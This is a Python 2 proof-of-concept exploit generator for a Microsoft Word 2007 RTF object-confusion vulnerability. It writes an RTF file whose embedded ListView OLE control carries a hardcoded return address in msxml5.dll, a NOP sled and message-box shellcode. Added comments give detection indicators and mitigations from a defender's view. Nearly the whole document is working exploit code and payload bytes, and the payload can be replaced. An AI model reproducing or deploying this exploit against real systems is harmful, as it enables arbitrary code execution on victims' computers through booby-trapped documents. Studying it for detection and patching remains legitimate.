Kalashnikov.

Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)


# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015
# Author : R-73eN
# Software : Microsoft Office Word 2007
# Tested : Windows 7 Starter
#
# Proof-of-concept generator.  Running it writes a single RTF file (path from
# argv[1]) whose body is one embedded OLE control ({\object\objocx{\*\objdata ...}})
# carrying a hex-encoded OLE2 compound file.  Decoding the hex below gives the
# ProgID "MSComctlLib.ListViewCtrl.2", a directory with the streams
# "Root Entry", "ObjInfo", "OCXNAME" and "Contents", a "ListViewA" record, and
# finally a fixed return address, a short NOP sled and the message-box shellcode.
#
# Review notes (defender's view):
#   * Python 2 only (print statements, text-mode write); not runnable as-is on 3.x.
#   * Detection: an RTF containing \objocx + \objdata whose hex begins with an
#     OLE1 header naming "MSComctlLib.ListViewCtrl.2" and then the OLE2 signature
#     D0CF11E0A1B11AE1 is the pattern worth alerting on; the control's ProgID and
#     the CLSID in the Root Entry (see below) are the natural indicators.
#   * The "ASLR bypass" in the title refers to the msxml5.dll address further down:
#     the original comment records that module as loaded without ASLR/rebasing, so
#     its address is fixed.  Keeping Office and its shared components patched, and
#     disabling (kill-bitting) controls the environment does not need, are the
#     standard mitigations; the "DEP bypass" claim is not verified here.

import sys

# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
# x86 shellcode kept as hex text; it is appended unchanged into the \objdata blob.
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'

#filecontent
# RTF header, font table and two empty paragraphs: ordinary document scaffolding.
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"

# Embedded OLE control.  Everything between {\*\objdata and its closing brace is
# the hex-encoded object that Word will parse and instantiate.
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"

# OLE1 object header: version 01050000, format 02000000, then a 0x1B-byte class
# name whose hex decodes to "MSComctlLib.ListViewCtrl.2\0".
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"

# OLE2 compound file (CFB).  D0CF11E0A1B11AE1 is the CFB signature; the long
# FFFFFFFF runs look like the unused entries of the header's sector tables.
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

# CFB directory.  Entry names are UTF-16LE: "Root Entry" here; the 16 bytes
# 4BF0D1BD8B85D111B16A00C0F0283628 in the entry appear to be the control's CLSID
# (GUID fields are little-endian).
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"

# "ObjInfo" stream entry.
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"

# "OCXNAME" stream entry.
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"

# "Contents" stream entry, followed by sector chain values and unused (FFFF) slots.
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

# Stream data.  "ListViewA" (UTF-16LE) is followed by the control's persisted
# record; per the title this is where the object-confusion condition is set up,
# which is not verified here.  The shellcode bytes appended next sit inside it.
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"

# Fixed return address (little-endian) into a module the original author recorded
# as loaded without ASLR/rebasing; this is the "ASLR bypass" of the title.
content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
# Message-box shellcode defined above.
content+= shellcode

#junk
# Zero padding after the payload.
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"

# Close \objdata, \object and \rtf1 in that order.
content+="}"
content+="}"
content+="}"

# ASCII-art banner printed on every run.  Note the string literals contain
# backslash sequences such as "\ " and "\|" that Python does not recognise as
# escapes; they are kept literally, as the author wrote them.
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n"

# Python 2 print statement.
print banner

# Usage: one positional argument, the output path.  The file is opened in text
# mode with no error handling, so an unwritable path raises IOError; on Windows
# the "\n" separators inside content are written as CRLF.
if(len(sys.argv) < 2):
    print '\n Usage : exploit.py filename.rtf'
else:
    filename = sys.argv[1]
    f=open(filename,"w")
    f.write(content)
    f.close()
    print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
